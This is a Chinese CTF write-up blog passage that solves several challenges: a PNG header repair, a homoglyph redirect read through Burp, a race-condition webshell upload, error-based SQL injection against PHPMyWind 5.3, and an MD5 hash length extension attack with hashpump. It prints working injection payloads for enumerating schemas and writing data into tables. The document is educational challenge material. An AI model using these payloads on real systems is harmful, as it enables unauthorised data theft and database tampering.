<p><img src="https://s1.ax1x.com/2018/01/01/pSfjfO.png" alt="2"></p>
<blockquote>
<p>结束符后边竟然还有东西，直接复制粘贴到HxD,随便找一张png图片对照修改文件头，保存打开</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pShpXd.png" alt="3"></p>
<blockquote>
<p>这里发现七牛云图不能上传带二维码的东西。。。。。</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfz1e.png" alt="4"></p>
<p><span style="color: red;">WTF?/????</span></p>
<blockquote>
<p>发生了什么。。。一定是文件头没改对全部，接下来就是各种搜索了</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pShmcQ.png" alt="5"></p>
<blockquote>
<p>就像图片显示的一样，找到长宽位置，发现 的确是不对称啊，修改之后再打开保存，嗯。。。。。可以了</p>
</blockquote>
<h2 id="白驹过隙"><a href="#白驹过隙" class="headerlink" title="白驹过隙"></a>白驹过隙</h2><blockquote>
<p>23333333333333333,虽然这道题只有十分，但是我一直没做出来。。。。。<br>打开链接<a href="http://202.119.201.199/challenge/basic/http/defauIt.php" target="_blank" rel="noopener">白驹过隙</a>，看到 you have missed the flag<br>很容易想到的就是抓包。如果你仔细看的话应该会发现，<span style="color: red;">链接里 defauIt 的第六个字母是大写 I，而不是小写 l</span>（典型的同形字符混淆，在大多数字体里两者几乎分不出来）。。。。（我是没看出来）<br>服务端返回的是 302 重定向，浏览器会自动跟随跳转，302 那条响应的正文根本不会显示出来；在浏览器地址栏直接改链接也还是会被跳走。所以掏出神器 burp，开拦截，修改请求里的链接后放行，同时拦截响应（Intercept responses），<br>302 响应的正文里就是 flag（用 curl 不加 -L 同样能直接看到这条响应）</p>
</blockquote>
<p>PS:这是我遇到的。。。。。感觉。。。。最。。。。。。让我。。。。额。。。。后面的词可以联想。。。。</p>
<h2 id="logic"><a href="#logic" class="headerlink" title="logic"></a>logic</h2><blockquote>
<p>这道题非常非常非常仔细地看 F12 里的页面源码（包括 HTML 注释、隐藏字段和引用的 js/css 路径）,就 OK 了<br>一个是备份文件泄露，一个算是偏向社工的吧，仔细点</p>
</blockquote>
<h2 id="上传三"><a href="#上传三" class="headerlink" title="上传三"></a>上传三</h2><blockquote>
<p>条件竞争（race condition）：服务端大概是先把上传的文件落盘、再做检查并删掉不合规的文件，两步之间存在一个很短的时间窗口。做法是一边并发地不断上传木马，一边并发地不断请求它的路径，只要有一次请求落在窗口内，文件就会被执行<br>手工点只能靠运气，用脚本或 Burp Intruder 多线程跑可以迅速得到 flag</p>
</blockquote>
<h2 id="phpmywind"><a href="#phpmywind" class="headerlink" title="phpmywind"></a>phpmywind</h2><blockquote>
<p>已经给了版本是5.3,打开谷歌搜索相关漏洞<br>有个留言板储存型xss,和前台注入<br>题目中明示删除了后台,要直接从数据库中提取,这个版本xss需要后台触发<br>所以基本确定注入</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2hfe.png" alt="函数"></p>
<blockquote>
<p>下面列取注入步緅(也是第一次很认真的做注入题目)</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWGV0.png" alt="phpmywind"></p>
<blockquote>
<p>首先确认注入点，但查询结果没有回显，很烦；最后的解决思路是把 select 出来的数据写进一张前台页面可以直接访问到的表里，再从页面上读出来</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSRmc9.png" alt="漏洞函数"></p>
<blockquote>
<p>有个东西叫做报错注入（用 floor(rand(0)*2) 配合 group by 制造 “Duplicate entry ... for key 'group_key'” 错误，把要查的数据带进报错信息里），全程都在用，具体原理可自行搜索。前提有两个：应用会把 MySQL 的错误信息原样输出到页面；from 后面的表至少有 3 行（information_schema.tables 肯定满足）</p>
</blockquote>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(*),concat(你要查询的语句,floor(rand(0)<span class="number">*2</span>))x <span class="keyword">from</span> information_schema.tables<span class="built_in"> group </span>by x</span><br></pre></td></tr></table></figure>
<p>一开始我在本地搭建了一下,源码子查询存在过滤,用char(@<code>%27</code>)绕过(别问我怎么知道的,小红跟我说的)</p>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2fYD.md.png" alt="过滤"></p>
<p>（改变以下语句中 limit n,1 里 n 的值，每次只取一条记录，一个个爆出来；报错注入一次只能带出一行数据，所以必须这样逐条遍历。具体解释网上都有，这一串算种套路了）</p>
<h3 id="获取基本信息"><a href="#获取基本信息" class="headerlink" title="获取基本信息"></a>获取基本信息</h3><blockquote>
<p>将你要的函数放在查询语句处</p>
</blockquote>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">system_user() 系统用户名</span><br><span class="line">user() 用户名</span><br><span class="line">current_user 当前用户名</span><br><span class="line">session_user()连接数据库的用户名</span><br><span class="line">database() 数据库名</span><br><span class="line">version() MYSQL数据库版本</span><br><span class="line">load_file() MYSQL读取本地文件的函数</span><br><span class="line">@@datadir 读取数据库路径</span><br><span class="line">@@basedir MYSQL 安装路径</span><br><span class="line">@@version_compile_os 操作系统</span><br></pre></td></tr></table></figure>
<h3 id="也可以这样一个个爆库"><a href="#也可以这样一个个爆库" class="headerlink" title="也可以这样一个个爆库"></a>也可以这样一个个爆库</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">sql</span>=select count(*),concat(char(@`%27`),(select SCHEMA_NAME <span class="keyword">from</span> information_schema.SCHEMATA limit n,1), 0x23,floor(rand(0)<span class="number">*2</span>),char(@`%27`))x <span class="keyword">from</span> information_schema.tables<span class="built_in"> group </span>by x</span><br></pre></td></tr></table></figure>
<h3 id="爆表"><a href="#爆表" class="headerlink" title="爆表"></a>爆表</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql=<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="built_in">char</span>(@<span class="string">`%27`</span>),(<span class="keyword">select</span> TABLE_NAME <span class="keyword">from</span> information_schema.TABLES <span class="keyword">where</span> TABLE_SCHEMA =<span class="number">16</span>进制库名 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>), <span class="number">0x23</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>),<span class="built_in">char</span>(@<span class="string">`%27`</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</span><br></pre></td></tr></table></figure>
<h3 id="爆字段"><a href="#爆字段" class="headerlink" title="爆字段"></a>爆字段</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql=<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="built_in">char</span>(@<span class="string">`%27`</span>),(<span class="keyword">select</span> column_name <span class="keyword">from</span> (<span class="keyword">select</span> * <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="number">16</span>进制表名 <span class="keyword">and</span> table_schema=<span class="number">16</span>进制库名 <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">1</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)t <span class="keyword">limit</span> <span class="number">1</span>), <span class="number">0x23</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>),<span class="built_in">char</span>(@<span class="string">`%27`</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</span><br></pre></td></tr></table></figure>
<h3 id="显示flag"><a href="#显示flag" class="headerlink" title="显示flag"></a>显示flag</h3><blockquote>
<p>由于 select 没有回显，可以想办法让它 select 之后把结果写进前台能显示出来的表里<br>我写入的是 pmw_info（注意下面用的是 replace into 并指定了 id=3，会覆盖掉该 id 原有的记录；CTF 环境里无所谓，但在真实的授权测试中这是破坏性操作，应改用不冲突的 id 或先备份）。具体表结构可以在源码里看，方便点</p>
</blockquote>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql=replace into pmw_info (`id`,`classid`,`mainid`,`picurl`,`content`,`posttime`) VALUES (<span class="number">3</span>,<span class="number">3</span>,<span class="number">1</span>,char(@`%<span class="number">27</span>`),(select flag <span class="keyword">from</span> phpmyflag.flag ),char(@`%<span class="number">27</span>`))</span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfndx.png" alt="效果"></p>
<h2 id="md5"><a href="#md5" class="headerlink" title="md5"></a>md5</h2><blockquote>
<p>(这道题，，，就是密码题,手动解吧,等过段时间–2017.10.03)<br>模仿着写了一个类似源码的东西,不过还是提交不对<br>让我怀疑是不是题目挂了,不过也可能是我哪里没注意到<br>这里的 16 进制不知道后台有没有先解码，我感觉我没读懂题目啊。。。。。这一点其实很关键：哈希长度扩展攻击要求你拼接进 md5 的字节和服务端实际拼接的字节完全一致。下面 hashpump 的 Input Data 给的是 6 个字面字符 “637972”，输出里的长度字段 0xb0（176 bit = 22 字节 = 16 字节 key + 6 字节数据）也是按 6 个字面字符算的；如果后台是先把参数 a 按 16 进制解码成 3 个字节 “cyr” 再拼接，那么 Input Data 应该给解码后的 3 字节，填充和长度字段都会随之变化，提交时也要按后台的解码方式把填充反向编码回去</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$key = <span class="string">'safwefdsfsacxwwl'</span>; <span class="comment">//16位salt</span></span><br><span class="line">	$b=$_GET[<span class="string">'a'</span>];</span><br><span class="line">	$k = md5($key.$b);</span><br><span class="line">	<span class="keyword">echo</span> $key.$b.<span class="string">'&lt;br/&gt;'</span>;</span><br><span class="line">	<span class="keyword">echo</span> $k.<span class="string">'&lt;br/&gt;'</span>;</span><br><span class="line">	<span class="keyword">if</span>($k ===$_GET[<span class="string">'c'</span>])&#123;</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'success&lt;/br&gt;'</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'fail&lt;/br&gt;'</span>;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWDq1.png" alt="生成"></p>
<blockquote>
<p>以前写的一篇小结,<a href="https://bayi87.github.io/2017/05/12/%E5%93%88%E5%B8%8C%E9%95%BF%E5%BA%A6%E6%89%A9%E5%B1%95%E6%94%BB%E5%87%BB/" target="_blank" rel="noopener">哈希拓展攻击</a><br>网上也是大把的资源,可以自己搜</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# hashpump</span><br><span class="line">Input Signature: 4dbe35eaea655b0a2b0d06391175b8a3</span><br><span class="line">Input Data: 637972</span><br><span class="line">Input Key Length: 16</span><br><span class="line">Input Data to Add: 70</span><br><span class="line">b186167e53b172a5d5f73d664b89e80c</span><br><span class="line">637972\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x00\x00\x00\x00\x00\x00\x0070</span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSW6IK.png" alt="利用"></p>

      
    </div>

    
      
      



      
      
    

    
    

  </article>


          </div>
          


        </div>
      </main>


    
  



    
  





  
  </body>
</html>
